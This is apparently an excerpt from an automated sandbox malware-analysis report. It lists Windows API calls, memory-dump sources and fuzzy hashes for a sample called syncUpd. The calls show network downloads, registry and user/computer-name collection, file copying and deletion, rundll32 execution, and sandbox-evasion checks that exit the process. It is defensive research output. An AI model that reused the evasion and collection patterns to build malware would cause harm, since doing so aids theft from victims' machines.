                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008F168C
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008F1710
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008F1737
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: lstrlen.KERNEL32(00000000), ref: 008F50B1
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F5122
                                                                                                                                                                                                                                                                • Part of subcall function 008F5027: StrCmpCA.SHLWAPI(?,00624C68), ref: 008F5140
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$CloseHeapLocalOpenmemset$AllocAllocateCopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2735668777-0
                                                                                                                                                                                                                                                              • Opcode ID: c8c279b3544a7551f314603e9532084fce410a271062ba78105d9905d8ac38f5
                                                                                                                                                                                                                                                              • Instruction ID: 7bbe3fa759d921de831f0ebc74a660eb52df80b48c6a3a700be2a66e43be7adb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8c279b3544a7551f314603e9532084fce410a271062ba78105d9905d8ac38f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C55101B1D442199FCB25FBA0DD96FEDB338AF94700F404199B60A621D1EE306B85CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008F4EF1
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008F4EF8
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 008F4F11
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008F4F38
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008F4F68
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F4FDC
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 008F4FE9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3066467675-0
                                                                                                                                                                                                                                                              • Opcode ID: f2ce6417e6930b23450b1961e67bb297c29231f482b2b7d409ac886f68cddac0
                                                                                                                                                                                                                                                              • Instruction ID: 2aa50b16999c1a0471eea865d35950278aad387813115a0ecdfd26d093f13140
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2ce6417e6930b23450b1961e67bb297c29231f482b2b7d409ac886f68cddac0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7231D6B4A4021CABDB20CF54DD85BEDB7B5FB88704F5081D9B709A7281DB706AC58F98
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00904005
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00904234,0041D28B), ref: 00904043
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00904091
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 009041E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 224852652-0
                                                                                                                                                                                                                                                              • Opcode ID: 1a26b6fa8bdaeb359c51be8f7994c2d1375265ef96f370ef8ce744ae01cba673
                                                                                                                                                                                                                                                              • Instruction ID: 076fcc9a4401bb9bb2eb4a526f775a35b47b0efa53054ff0527051f181340134
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a26b6fa8bdaeb359c51be8f7994c2d1375265ef96f370ef8ce744ae01cba673
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47517EF0D042199FDB64EB94DC85BEEB774EF98304F1041A9E615A72C1EB346A84CF58
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00964EE8,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00964A48,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964A60), ref: 00411E2B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                                                              • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                              • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0090200C
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00624CBC,00000000,00020119,?), ref: 0090202B
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,006248D4,00000000,00000000,00000000,000000FF), ref: 0090204F
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00902059
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0090207E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624964), ref: 00902092
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                              • String ID: X@
                                                                                                                                                                                                                                                              • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00417BAE
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
                                                                                                                                                                                                                                                                • Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB
                                                                                                                                                                                                                                                                • Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A00), ref: 00906178
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624DA4), ref: 00906191
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624E10), ref: 009061A9
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A60), ref: 009061C1
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624A4C), ref: 009061DA
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624AEC), ref: 009061F2
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624CB8), ref: 0090620A
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624B30), ref: 00906223
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624D84), ref: 0090623B
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624D28), ref: 00906253
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624BAC), ref: 0090626C
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624AE0), ref: 00906284
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,00624DD8), ref: 0090629C
                                                                                                                                                                                                                                                                • Part of subcall function 00906137: GetProcAddress.KERNEL32(00625074,006248B0), ref: 009062B5
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 008F13F7: ExitProcess.KERNEL32 ref: 008F1438
                                                                                                                                                                                                                                                                • Part of subcall function 008F1387: GetSystemInfo.KERNEL32(?), ref: 008F1391
                                                                                                                                                                                                                                                                • Part of subcall function 008F1387: ExitProcess.KERNEL32 ref: 008F13A5
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008F1352
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: VirtualAllocExNuma.KERNEL32(00000000), ref: 008F1359
                                                                                                                                                                                                                                                                • Part of subcall function 008F1337: ExitProcess.KERNEL32 ref: 008F136A
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008F1465
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: __aulldiv.LIBCMT ref: 008F147F
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: __aulldiv.LIBCMT ref: 008F148D
                                                                                                                                                                                                                                                                • Part of subcall function 008F1447: ExitProcess.KERNEL32 ref: 008F14BB
                                                                                                                                                                                                                                                                • Part of subcall function 00903697: GetUserDefaultLangID.KERNEL32 ref: 0090369B
                                                                                                                                                                                                                                                                • Part of subcall function 008F13B7: ExitProcess.KERNEL32 ref: 008F13ED
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: GetProcessHeap.KERNEL32(00000000,00000104,008F13DE,00624DE8), ref: 00904634
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: RtlAllocateHeap.NTDLL(00000000), ref: 0090463B
                                                                                                                                                                                                                                                                • Part of subcall function 00904627: GetUserNameA.ADVAPI32(?,00000104), ref: 00904653
                                                                                                                                                                                                                                                                • Part of subcall function 00904667: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00904674
                                                                                                                                                                                                                                                                • Part of subcall function 00904667: RtlAllocateHeap.NTDLL(00000000), ref: 0090467B
                                                                                                                                                                                                                                                                • Part of subcall function 00904667: GetComputerNameA.KERNEL32(?,00000104), ref: 00904693
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 009039F1
                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00903A0F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00903A20
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00903A2B
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,00624D20,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 00903A41
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00903A49
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2525456742-0
                                                                                                                                                                                                                                                              • Opcode ID: 46515f5eae24d0a6147c7cb61a4b11b40ebb98da62e4e0d1738e1df983633f24
                                                                                                                                                                                                                                                              • Instruction ID: 73defcbbdd4a42af91343c4dd8aea4f79125e37d4808be0e8eb010503ed22a71
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46515f5eae24d0a6147c7cb61a4b11b40ebb98da62e4e0d1738e1df983633f24
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D312AB1E44208AEDB14FBF0DC56FBDB779BF94710F104518B112A62D2EF746A05CA62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                                                                                                              • Opcode ID: f4e0d313ddcfb566cad0ad739db1598a31e32847b8e3d9904cd15aeed94fad13
                                                                                                                                                                                                                                                              • Instruction ID: 89e0b7de04a8c9973cc3c0250d49d8ca958c17fa3e0653c028d8d89e5e601826
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4e0d313ddcfb566cad0ad739db1598a31e32847b8e3d9904cd15aeed94fad13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9312C74A0020DEFDB24DFA4C895BAE77B9FF58314F108159E911E7290DB78A941CFA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                                                              • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                                                              • API String ID: 672783590-3078973353
                                                                                                                                                                                                                                                              • Opcode ID: ce24d530f826aae9115090267b766426043ee13ae648b95ca54e1aa72ad7c54d
                                                                                                                                                                                                                                                              • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce24d530f826aae9115090267b766426043ee13ae648b95ca54e1aa72ad7c54d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
